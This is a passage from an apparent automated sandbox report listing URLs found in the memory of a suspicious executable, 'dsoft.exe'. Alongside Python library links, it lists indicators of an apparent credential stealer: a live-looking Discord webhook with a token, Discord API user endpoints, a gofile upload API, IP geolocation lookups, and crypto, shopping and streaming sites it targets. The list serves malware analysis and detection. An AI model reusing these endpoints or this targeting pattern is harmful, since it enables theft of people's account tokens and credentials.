http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: dsoft.exe, 00000001.00000003.2008873908.0000029488559000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: dsoft.exe, 0000000E.00000003.2677159398.000001FA5CD10000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftom/pkiops/Docs/Repository./
Source: dsoft.exe, 00000001.00000003.2009384833.0000029488561000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570023169.0000029489854000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2602623874.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2450722331.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: dsoft.exe, 00000001.00000003.2553744877.000002948964C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.00000294896AA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.0000029489689000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547689005.000002948964A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192181460.000001FA5CCDF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)z&
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)z
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.jaraco.com/skeleton
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568096593.0000029489080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue44497.
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/rt
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://codecov.io/gh/pypa/setuptools
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/users/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/guilds/
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/guilds/r
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/users/
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/channels/803025117553754132/815945031150993468
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/r
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gift/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://disney.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disney.com)z$
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548897228.0000029488294000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546117734.0000029488C7D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540224185.0000029488293000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545529426.0000029488294000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539909753.0000029488247000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686089490.000001FA5C2BC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192239761.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705327987.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685660711.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html
Source: dsoft.exe, 0000000E.00000003.2686089490.000001FA5C2BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html#pprin
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548897228.0000029488294000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546117734.0000029488C7D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540224185.0000029488293000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545529426.0000029488294000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539909753.0000029488247000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686089490.000001FA5C2BC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192239761.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705327987.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685660711.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
Source: dsoft.exe, 00000001.00000003.2010117969.0000029488B32000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568339086.0000029489280000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542106734.000002948855A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192239761.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2707457912.000001FA5C8E0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html
Source: dsoft.exe, 00000001.00000003.2012706454.0000029488D30000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2012706454.0000029488CF1000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488AF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488B32000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567821197.0000029488F60000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ebay.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ebay.com)z$
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://epicgames.com)
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)z
Source: dsoft.exe, 00000001.00000002.2568617414.0000029489480000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://geolocation-db.com/jsonp/
Source: dsoft.exe, 00000001.00000002.2571777281.000002948A640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://geolocation-db.com/jsonp/8.46.123.189
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://geolocation-db.com/jsonp/z
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com)z
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551023834.0000029488D52000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D44000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538502923.0000029488D43000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548120060.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549984820.0000029488D4F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562652028.00000294861C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2556855822.0000029486189000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562326330.0000029486191000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542181367.00000294861C2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559071670.000002948618F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: dsoft.exe, 00000000.00000003.1997172891.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1991278699.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1984920843.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1996740060.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1995076039.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1991995778.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1996740060.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1995076039.00000177161F5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1995267328.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168703723.000001463F1F7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168910308.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168802143.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166448280.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166184216.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168703723.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168910308.000001463F1F7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2169044397.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2158724693.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/black
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packagingP
Source: dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packagingn_py
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/discussions
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues
Source: dsoft.exe, 00000001.00000002.2567821197.0000029488F60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: dsoft.exe, 00000001.00000002.2565697167.0000029488620000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/workflows/tests/badge.svg
Source: dsoft.exe, 0000000E.00000003.2682720383.000001FA5C2C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
Source: dsoft.exe, 00000001.00000002.2563065395.0000029487DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: dsoft.exe, 00000001.00000003.2556855822.0000029486189000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562326330.0000029486191000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559071670.000002948618F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/r
Source: dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562652028.00000294861C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542181367.00000294861C2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562652028.00000294861C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2556855822.0000029486189000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562326330.0000029486191000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542181367.00000294861C2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559071670.000002948618F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: dsoft.exe, 00000001.00000002.2568617414.0000029489480000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
